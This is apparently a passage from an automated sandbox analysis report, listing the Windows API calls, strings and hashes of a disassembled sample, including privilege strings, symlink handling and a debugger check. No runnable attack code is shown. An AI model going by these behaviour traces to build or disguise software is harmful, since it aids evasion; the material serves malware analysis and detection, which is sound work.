                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: d96b04eaee887e6bee36e43188483775220f0fae779f09797e0c51decca3e29b
                                                                                    • Instruction ID: 6473c4c21d4736a9f9556ebee79b12add9c5aa85629acbb79ef9616bbfe3022a
                                                                                    • Opcode Fuzzy Hash: d96b04eaee887e6bee36e43188483775220f0fae779f09797e0c51decca3e29b
                                                                                    • Instruction Fuzzy Hash: 78A011A22A800ABC3088B280AC03C3B020CC0C0B20330880EB88280080BB8008208AB0
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C738
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: cd6cee604e1840af6fd94cd984d25a5c6133886b28eceae31dc8fd3b78a776b1
                                                                                    • Instruction ID: 6473c4c21d4736a9f9556ebee79b12add9c5aa85629acbb79ef9616bbfe3022a
                                                                                    • Opcode Fuzzy Hash: cd6cee604e1840af6fd94cd984d25a5c6133886b28eceae31dc8fd3b78a776b1
                                                                                    • Instruction Fuzzy Hash: 78A011A22A800ABC3088B280AC03C3B020CC0C0B20330880EB88280080BB8008208AB0
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C738
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 576574a5ef89e52954a0c608e2eea2075aa4eafaaf9bd2788fdbd048f0c76c00
                                                                                    • Instruction ID: 6473c4c21d4736a9f9556ebee79b12add9c5aa85629acbb79ef9616bbfe3022a
                                                                                    • Opcode Fuzzy Hash: 576574a5ef89e52954a0c608e2eea2075aa4eafaaf9bd2788fdbd048f0c76c00
                                                                                    • Instruction Fuzzy Hash: 78A011A22A800ABC3088B280AC03C3B020CC0C0B20330880EB88280080BB8008208AB0
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C738
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 3fdae64214cbe87a6abd0776a1f8d3c3c9c50d5bd547f08b01f37e7cecfdb2a8
                                                                                    • Instruction ID: 6473c4c21d4736a9f9556ebee79b12add9c5aa85629acbb79ef9616bbfe3022a
                                                                                    • Opcode Fuzzy Hash: 3fdae64214cbe87a6abd0776a1f8d3c3c9c50d5bd547f08b01f37e7cecfdb2a8
                                                                                    • Instruction Fuzzy Hash: 78A011A22A800ABC3088B280AC03C3B020CC0C0B20330880EB88280080BB8008208AB0
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C799
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 3105fce14157fae207889b05616d64b49bd5fb3305e3e9c4d466aa49915118f8
                                                                                    • Instruction ID: d316e3c084d2e899067859f3e4ca6bf3cd918bdb851c0cfa497829a130537c52
                                                                                    • Opcode Fuzzy Hash: 3105fce14157fae207889b05616d64b49bd5fb3305e3e9c4d466aa49915118f8
                                                                                    • Instruction Fuzzy Hash: C7A011A22A8002BC3008B280AC02C3B220CC2C0B20330880EB88280080BB8008A088B0
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C799
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: f352f1c829801405f4c5c20371037b1c0c234b184970cbc12a27c4161d6eb17c
                                                                                    • Instruction ID: d316e3c084d2e899067859f3e4ca6bf3cd918bdb851c0cfa497829a130537c52
                                                                                    • Opcode Fuzzy Hash: f352f1c829801405f4c5c20371037b1c0c234b184970cbc12a27c4161d6eb17c
                                                                                    • Instruction Fuzzy Hash: C7A011A22A8002BC3008B280AC02C3B220CC2C0B20330880EB88280080BB8008A088B0
                                                                                    APIs
                                                                                    • SetEndOfFile.KERNELBASE(?,00158EDB,?,?,-00001954), ref: 00159B6D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
Similarity
• API ID: File
• String ID:
• API String ID: 749574446-0
• Opcode ID: 0a6ef18d7ecdfb9f56dfedc5ca9621bec85f3c5f3fd9c8658570092b3364f4fb
• Instruction ID: a3e2c9ecf5d287baa8b99a6fb636722acfd18bafc24535b8ba9747e836268bad
• Instruction Fuzzy Hash: B0B011300E080A8A8E822B30CC088203A20EB2230A30082A0B00AC80A0CB22C00AAB00
APIs
• SetCurrentDirectoryW.KERNELBASE(?,0016927A,00192120,00000000,00193122,00000006), ref: 00169027
Similarity
• API ID: CurrentDirectory
• String ID:
• API String ID: 1611563598-0
• Opcode ID: edb1eab5f0cdc8470dafaf7590340820c04e56548df277786cefd8a920cd40d1
• Instruction ID: 72a96c4e3c16de5d9e733be957dcd31bb4043d078b7e4e9605e225791a2f9615
• Instruction Fuzzy Hash: D2A0123019410A46CA410B30CC0DC1577505B60702F0086207002C00A0CB30C854E700
APIs
• CloseHandle.KERNELBASE(000000FF,?,?,00159473), ref: 001594BE
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 71764f80d98d6e9c06d2bf3b81a636b9c8ccd834a54a8dc58de408a5da40d726
• Instruction ID: c59e4153be6ca023155d79502d7669a19cdd594115f82821229b0bce5bd642b6
• Instruction Fuzzy Hash: 8DF0BE30186B44CEDB308A24D609792B3E89B11723F048B1ED8FA4B8D0D371A84E8B52
APIs
  • Part of subcall function 001512E7: GetDlgItem.USER32(00000000,00003021), ref: 0015132B
  • Part of subcall function 001512E7: SetWindowTextW.USER32(00000000,001802E4), ref: 00151341
• SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0016A5C8
• EndDialog.USER32(?,00000006), ref: 0016A5DB
• GetDlgItem.USER32(?,0000006C), ref: 0016A5F7
• SetFocus.USER32(00000000), ref: 0016A5FE
• SetDlgItemTextW.USER32(?,00000065,?), ref: 0016A63E
• SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0016A671
• FindFirstFileW.KERNEL32(?,?), ref: 0016A687
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0016A6A5
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0016A6B5
• GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0016A6D2
• GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0016A6F0
  • Part of subcall function 0015D142: LoadStringW.USER32(?,?,00000200,?), ref: 0015D187
  • Part of subcall function 0015D142: LoadStringW.USER32(?,?,00000200,?), ref: 0015D19D
• _swprintf.LIBCMT ref: 0016A720
  • Part of subcall function 00153F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00153F6E
• SetDlgItemTextW.USER32(?,0000006A,?), ref: 0016A733
• FindClose.KERNEL32(00000000), ref: 0016A736
• _swprintf.LIBCMT ref: 0016A791
• SetDlgItemTextW.USER32(?,00000068,?), ref: 0016A7A4
• SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0016A7BA
• FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0016A7DA
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0016A7EA
• GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0016A804
• GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0016A81C
• _swprintf.LIBCMT ref: 0016A84D
• SetDlgItemTextW.USER32(?,0000006B,?), ref: 0016A860
• _swprintf.LIBCMT ref: 0016A8B0
• SetDlgItemTextW.USER32(?,00000069,?), ref: 0016A8C3
  • Part of subcall function 0016932F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00169355
  • Part of subcall function 0016932F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0018A154,?,?), ref: 001693A4
Similarity
• API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
• String ID: %s %s$%s %s %s$REPLACEFILEDLG
• API String ID: 3227067027-1840816070
• Opcode ID: 264e89c050e0234daf61614f6ff6492b6600d111b51b982104402e029c7b7012
• Instruction ID: 968711b027ae9374f8075dbfdc782627e00b56233d871de364ef6c9beb7da161
• Instruction Fuzzy Hash: 2991A272548348BBE231DBA0CC89FFB77ACEF4A701F444819B646D6480D771AA498B63
APIs
• __EH_prolog.LIBCMT ref: 00157075
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 001571D5
• CloseHandle.KERNEL32(00000000), ref: 001571E5
  • Part of subcall function 00157A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00157AAC
  • Part of subcall function 00157A9D: GetLastError.KERNEL32 ref: 00157AF2
  • Part of subcall function 00157A9D: CloseHandle.KERNEL32(?), ref: 00157B01
• CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 001571F0
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 001572FE
• DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 0015732A
• CloseHandle.KERNEL32(?), ref: 0015733C
• GetLastError.KERNEL32(00000015,00000000,?), ref: 0015734C
• RemoveDirectoryW.KERNEL32(?), ref: 00157398
• DeleteFileW.KERNEL32(?), ref: 001573C0
Similarity
• API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
• String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
• API String ID: 3935142422-3508440684
• Opcode ID: 0e85448d30343becea7f124309e13f73d35901725e157d374083872fe48861c3
• Instruction ID: 96f633f0d286ae9fe7d567b5441515f4356d8c8df5f4e1deb24774e881bdd555
• Instruction Fuzzy Hash: 7EB1B171904618EFDB21DF64DC46BEE77B8AF18301F144469FD29EB282D730AA49CB61
Similarity
• API ID: H_prolog_memcmp
• String ID: CMT$h%u$hc%u
• API String ID: 3004599000-3282847064
• Opcode ID: a1492db76934f3e65765e8b7ab71aca4ce1beb347689736f0fc86574a8bc5b9a
• Instruction ID: 62abc263b6f25d2a10f471f39f3d7d0a5e9a7bf8fc0eed3a3940f9e1cf8793ae
• Instruction Fuzzy Hash: 2332BF71510384DFDB19DF64C886AEA3BA5AF25345F044479FDAA8F282DB709A4CCB60
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: d8d4714143d4381bb14c8ffed4165fdf45db687dc59d037f2559ccea3e87ca0d
• Instruction ID: 500e4f079faed7d2608365764baaa9eb09915eb8612cd0658b0f2c376757b379
• Instruction Fuzzy Hash: 27C21971E086288BDB29CE28DD847EEB7B5EF84305F5581EAD44DE7240E774AE818F41
APIs
• __EH_prolog.LIBCMT ref: 00152775
• _strlen.LIBCMT ref: 00152CFF
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00152E56
Similarity
• API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@_strlen
• String ID: CMT
• API String ID: 3741668355-2756464174
• Opcode ID: 9bc7cbdb0716b321c9d2b0705a5c4ae67bc149aafa6d364f490be8552b776f9c
• Instruction ID: 24243b9c1b6641be6af95affe796b25aa74960cc751e777069993f23feaf8f2d
• Instruction Fuzzy Hash: A062D172A00684CFDB19DF74C8856EA3BE1AF65305F05457EECAA8F282D770994DCB60
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00175C4B
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00175C55
• UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00175C62
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: a89824826242e2ceeef9a158b0952e65cd633b0397950ddfa06271b491a8e6f0
• Instruction ID: cca379808d3b9a4261fd9799e631c04c669bae351ee2deb17243bf3baae0b1aa
• Instruction Fuzzy Hash: 9431D374D0122C9BCB21DF64DC8979CBBB8BF18310F5045EAE80CA7250E7709B958F45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                    • Instruction ID: e5077ae19e5becc45d0a26510c8a7136da5feeac03b30c77bc890465c0d52dc6
                                                                                    • Opcode Fuzzy Hash: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                    • Instruction Fuzzy Hash: 3B021D71E002199FDF14CFA9C8906AEBBF1FF88314F65816AE919E7341D731AA418B91
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00169355
                                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,0018A154,?,?), ref: 001693A4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                    • String ID:
                                                                                    • API String ID: 2169056816-0
                                                                                    • Opcode ID: 8e8fe86e0e535d4ae16c5d7acd9a60364da9d043eec3479d9f9b8b325074c957
                                                                                    • Instruction ID: 683802e1adea42e41d718dd66c848e5273480d7b1c49b4a05edfe7731f9121d7
                                                                                    • Opcode Fuzzy Hash: 8e8fe86e0e535d4ae16c5d7acd9a60364da9d043eec3479d9f9b8b325074c957
                                                                                    • Instruction Fuzzy Hash: C0015E35500349ABDB109FB4DD49FAB77BCEF49720F404422BA04E75A0D3709A69CBA6
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0017E8CF,?,?,00000008,?,?,0017E56F,00000000), ref: 0017EB01
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: fbb3c60f401b870738fdf4985abebc05e6a1c4ffdd9cd282907c7442900aaa93
                                                                                    • Instruction ID: 82fee0d3a2d590caff15319a20fa94721fa722c5d51815e182bc9cc262ad627c
                                                                                    • Opcode Fuzzy Hash: fbb3c60f401b870738fdf4985abebc05e6a1c4ffdd9cd282907c7442900aaa93
                                                                                    • Instruction Fuzzy Hash: 21B11A325106089FD719CF28C48AB657BF1FF49365F29C698E99ACF2A1C335E991CB40
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: gj
                                                                                    • API String ID: 0-4203073231
                                                                                    • Opcode ID: 7944bd1afc12b196b267d1e28d12030be25fc936580356e528cb480079b7fe16
                                                                                    • Instruction ID: 969d1b3bc7a760a630f1fb07846aa511286e75e0239096149ea957c6a0efbf5d
                                                                                    • Opcode Fuzzy Hash: 7944bd1afc12b196b267d1e28d12030be25fc936580356e528cb480079b7fe16
                                                                                    • Instruction Fuzzy Hash: 0FF1C3B1A083418FD788CF29D890A1AFBE1BFCC208F15892EF998D7711D734E9558B56
                                                                                    APIs
                                                                                    • GetVersionExW.KERNEL32(?), ref: 0015A905
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Version
                                                                                    • String ID:
                                                                                    • API String ID: 1889659487-0
                                                                                    • Opcode ID: 682b5a792ffc52a274638ad338fa450294bf0dd4e3d27c3f048d2cede8e3f1b4
                                                                                    • Instruction ID: a1a746f186609958197e2122b59701a15e844ca7026bf241e457fb98bbbb6711
                                                                                    • Opcode Fuzzy Hash: 682b5a792ffc52a274638ad338fa450294bf0dd4e3d27c3f048d2cede8e3f1b4
                                                                                    • Instruction Fuzzy Hash: 6DF090B4900719CBCB28CF18EC82AE473B5FB49315F610395E92557B90D3719EC48FA2
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001DBCF,0016D604), ref: 0016DBC8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: be99e57d45731fa9e1213674c269eba2c8649c7bb51024205421cd50f8c8fc88
                                                                                    • Instruction ID: f91d7ae702a9429fb2da540f4db3af6f6d3f4421676242220809dbc0ba1d3ff0
                                                                                    • Opcode Fuzzy Hash: be99e57d45731fa9e1213674c269eba2c8649c7bb51024205421cd50f8c8fc88
                                                                                    • Instruction Fuzzy Hash:
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 54951025-0
